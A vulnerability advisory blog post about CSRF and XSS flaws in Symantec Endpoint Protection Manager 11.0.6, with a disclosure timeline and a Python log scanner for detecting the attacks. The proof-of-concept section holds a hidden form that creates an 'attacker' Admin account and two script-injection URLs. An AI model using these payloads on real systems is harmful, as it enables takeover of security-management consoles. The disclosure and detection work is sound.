Saturday, April 28, 2012

Symantec Endpoint Protection Manager 11.0.6 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Symantec Endpoint Protection Manager Console lets users centrally manage the Symantec Endpoint Protection clients. From the console, users can install clients, set and enforce a security policy, and monitor and report on the clients. The console can be run from the computer hosting Symantec Endpoint Protection Manager or remotely through a Web-based interface.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in Symantec Endpoint Protection Manager. These issues were discovered in a default installation of Symantec Endpoint Protection Manager 11.0.6. Other earlier versions may also be affected.

Proof of concept
Cross-Site Request Forgery (CSRF)

<form action="https://[target]:8443/portal/Settings.jsp?action=NewAccount" id="csrf" method="post">
  <input type="hidden" name="spcName" value="attacker" />
  <input type="hidden" name="spcUsername" value="attacker" />
  <input type="hidden" name="spcNewPwd" value="passwd123" />
  <input type="hidden" name="spcNewPwd2" value="passwd123" />
  <input type="hidden" name="group1" value="Admin" />
  <input type="hidden" name="btnSubmit" value="Create+Account" />
</form>

Cross-Site Scripting (XSS)

  • https://[target]:8443/console/apps/sepm/?>'"><script>alert(1)</script>
  • https://[target]:8443/portal/Help.jsp?token='"--></style></script><script>alert(1)</script>

Symantec has released patches which address these issues. Please see the references for more information.
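
To check whether requests of the kind shown above reached a console, the following added example (not part of the original advisory or of any Symantec tooling) scans web access logs for the account-creation POST arriving with a missing or foreign Referer, and for script/style markup sent to the two XSS endpoints. The log layout, the console hostname and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: Apache/Tomcat "combined" access-log layout; adapt the regex to yours.
LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"')
# Markup seen in the advisory's XSS URLs once the request target is percent-decoded.
MARKUP = re.compile(r'<\s*/?\s*(script|style)\b', re.I)

def classify(line, console_host):
    """Return the tags that apply to one access-log line (empty list: nothing notable)."""
    m = LINE.match(line)
    if not m:
        return []
    tags = []
    url = urlsplit(m["target"])
    # CSRF indicator: the account-creation POST from the advisory arriving with a
    # Referer that is absent or names a host other than the console itself.
    if (m["method"] == "POST" and url.path == "/portal/Settings.jsp"
            and parse_qs(url.query).get("action") == ["NewAccount"]):
        if urlsplit(m["referer"]).hostname != console_host.lower():
            tags.append("csrf-suspect")
    # XSS indicator: script/style markup sent to either endpoint the advisory lists.
    if (url.path.startswith(("/console/apps/sepm/", "/portal/Help.jsp"))
            and MARKUP.search(unquote(m["target"]))):
        tags.append("xss-probe")
    return tags

def scan(lines, console_host):
    """Return (line_number, source_ip, tag) for every flagged line."""
    return [(n, LINE.match(l)["src"], t)
            for n, l in enumerate(lines, 1) for t in classify(l, console_host)]

CONSOLE_HOST = "sepm.example.internal"  # hypothetical console hostname
SAMPLE = [  # constructed log lines, not taken from a real system
    '10.0.0.5 - admin [01/Jan/2011:10:00:01 +0000] "POST /portal/Settings.jsp?action=NewAccount HTTP/1.1" 200 512 "https://sepm.example.internal:8443/portal/Settings.jsp" "Mozilla/5.0"',
    '10.0.0.5 - admin [01/Jan/2011:10:05:09 +0000] "POST /portal/Settings.jsp?action=NewAccount HTTP/1.1" 200 512 "http://other.example.net/page.html" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2011:10:06:00 +0000] "GET /portal/Help.jsp?token=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2011:10:07:00 +0000] "GET /portal/Help.jsp?token=abc123 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE, CONSOLE_HOST):
        print(hit)
```

A missing Referer is flagged as well as a foreign one, so expect some benign hits from clients that strip the header; correlate each hit with the administrator accounts that exist on the console.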


Vendor URL:

Disclosure Timeline
2011-03-07 - Vulnerabilities discovered.
2011-03-07 - Vulnerabilities reported to Secunia.
2011-03-09 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-08-10 - Patch released.
2011-08-11 - Advisory published by Secunia.
